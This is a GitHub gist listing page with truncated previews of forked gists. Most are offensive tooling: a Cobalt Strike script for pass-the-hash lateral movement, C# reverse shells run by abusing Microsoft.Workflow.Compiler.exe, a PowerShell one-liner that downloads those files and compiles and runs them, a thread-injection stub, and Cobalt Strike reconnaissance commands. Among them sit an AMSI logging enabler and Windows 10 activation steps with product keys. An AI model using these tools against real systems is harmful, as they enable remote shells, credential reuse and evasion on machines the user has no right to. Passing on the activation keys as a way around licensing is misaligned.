Dave Hardy davehardy20

  • UK
davehardy20 / EnableAMSILogging.ps1
Created Nov 15, 2018 — forked from mattifestation/EnableAMSILogging.ps1
Enables AMSI logging to the AMSI/Operational event log
View EnableAMSILogging.ps1
# Run this elevated, reboot, boom.
# Feel free to name this whatever you want
$AutoLoggerName = 'MyAMSILogger'
$AutoLoggerGuid = "{$((New-Guid).Guid)}"
New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled
Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41
davehardy20 / smbexec_psh.cna
Created Oct 24, 2018 — forked from realoriginal/smbexec_psh.cna
Cheap solution to problems with make_token, psexec/lateral movement/sekurlsa::pth for cross-domain PTH in the same forest.
View smbexec_psh.cna
# Lateral Movement using Invoke-TheHash toolkit
# Written by Mumbai
# git clone
# mv Invoke-TheHash/Invoke-TheHash.ps1 Invoke-TheHash.ps1
# cat Invoke-TheHash/Invoke-*.ps1 >> Invoke-TheHash.ps1
beacon_command_register("smbexec_psh", "Lateral movement using Invoke-TheHash toolkit",
"Synopsis: smbexec_psh [x86/x64] [target] [listener] [username] [domain] [ntlm]\n\n",
"Run a payload on a target via Invoke-TheHash SMBExec");
davehardy20 / windows10activation
Created Oct 24, 2018 — forked from realoriginal/windows10activation
Activate Windows 10 without Any Activator
View windows10activation
1. Open CMD as Administrator
2. Paste the following commands into CMD one by one, in order.
cscript slmgr.vbs /ipk "SERIAL NUMBER HERE"
Replace SERIAL NUMBER HERE with any of these, according to your Windows 10 installation type.
Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR
Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH
View sedebug_rtlcreatethread.c
/*! @brief */
#include <windows.h>
#include <stdio.h>
typedef DWORD(WINAPI *prototype_RtlCreateUserThread)(
HANDLE ProcessHandle,
BOOL CreateSuspended,
ULONG StackZeroBits,
PULONG StackReserved,
davehardy20 / REV.txt
Created Oct 22, 2018 — forked from BankSecurity/REV.txt
Microsoft.Workflow.Compiler.exe abuse to open a live C# reverse shell
View REV.txt
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="" xmlns="">
<files xmlns:d2p1="">
<parameters xmlns:d2p1="">
<assemblyNames xmlns:d3p1="" xmlns="" />
<compilerOptions i:nil="true" xmlns="" />
<coreAssemblyFileName xmlns=""></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="" xmlns="" />
davehardy20 / Rev.Shell
Created Oct 22, 2018 — forked from BankSecurity/Rev.Shell
Abuse Microsoft.Workflow.Compiler.exe to compile a C# reverse shell
View Rev.Shell
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;
public class Program : SequentialWorkflowActivity
davehardy20 / PowerShell_Command.txt
Created Oct 22, 2018 — forked from BankSecurity/PowerShell_Command.txt
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
View PowerShell_Command.txt
powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\Rev.Shell') }" && C:\Windows\Microsof
davehardy20 / Simple_Rev_Shell.cs
Created Oct 22, 2018 — forked from BankSecurity/Simple_Rev_Shell.cs
C# Simple Reverse Shell Code
View Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
View Build_In_Memory_CSharp_Project.txt
After a little more research, the 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Creates various tmp files
- Compiles with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Converts to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
davehardy20 / cobaltstrike_sa.txt
Created Sep 29, 2018 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections: